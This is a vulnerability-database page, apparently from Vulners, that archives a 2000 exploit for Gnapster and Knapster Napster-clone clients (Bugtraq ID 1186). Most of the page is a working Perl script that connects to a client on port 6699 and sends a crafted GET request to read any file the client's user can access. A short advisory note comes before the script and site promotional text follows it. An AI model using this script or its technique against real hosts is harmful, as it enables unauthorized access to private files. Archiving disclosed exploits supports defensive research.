Vulners
Lucene search
John Donoghue Knapster 0.9/1.3.8 - File Access
source: https://www.securityfocus.com/bid/1186/info
Various open source clones of the Napster software package have a vulnerability by which users may view files on a machine running a vulnerable Napster clone client. The file access is limited to files accessible by the user running the client. The official commercial version of Napster does not contain this vulnerability.
#!/usr/bin/perl
########################################################################
# #
# Gnapster / Knapster "view any file" exploit #
# #
# This script was originally written by no_maam on May the 13th 2000 #
# and modified by Dennis ([email protected]) on May the 14th. #
# #
# It exploits a bug in Gnapster prior to 1.3.9 discovered by #
# Jim Early on May the 10th 2000 and a bug in Knapster up to 0.10 #
# discovered by Tom Daniels on May the 10th 2000. #
# Due to a design error in Gnapster and Knapster it's possible to #
# view any file Gnapster / Knapster has access to because the #
# application fails to check that the requested file is an #
# explicitly shared MP3 file before providing it. #
# #
# NOTE: Both clients crashed very often while testing this script! #
# #
# See Bugtraq ID 1186 at http://www.securityfocus.com for details. #
# #
# Standard disclaimer applies. #
# #
########################################################################
use IO::Socket;
unless (@ARGV >= 2) {
&args
}
print " .: Gnapster / Knapster \"view any file\" exploit by no_maam and Dennis Conrad :.\n\n";
$host = $ARGV[0];
$file = $ARGV[1];
$file =~ s/\//\\/g; # Replace any / in filename with \
if ($ARGV[2] == "") { #
$port = 6699 # Use port 6699
} elsif ($ARGV[2] != ""){ # if none specified
$port = $ARGV[2] #
}
if ($ARGV[3] eq "") { #
$name = "nobody" # Use name "nobody"
} elsif ($ARGV[3] ne ""){ # if none specified
$name = $ARGV[3] #
}
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port
) || die " Couldn't open port $port on
$host\n";
$remote->autoflush(1);
sleep 2; # Wait two seconds (slow connection)
print $remote "GET$name \"$file\" 0\n"; # Get the file
while (<$remote>) {
if ($_ =~ /FILE NOT FOUND/) { # Test is file exists
print " File $file not found or the client has no permission so access it.\n";
exit 1 # Return exit status 0 (for shellscripts)
}
if ($_ =~ /NOT SHARED/) { # Test for fixed version of Gnapster / Knapster
print " Sorry, this is a fixed client\n";
exit 1
}
push @output, $_ # Write file to @output
}
print "\n@output\n"; # Print @output to STDOUT
close $remote;
exit 0;
sub args {
print " Usage: $0 <host> <file> [port] [name]\n";
print " By default port 6699 and name \"nobody\" is used.\n";
exit 1
}
# EOFData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 May 2000 00:00Current
7High risk
Vulners AI Score7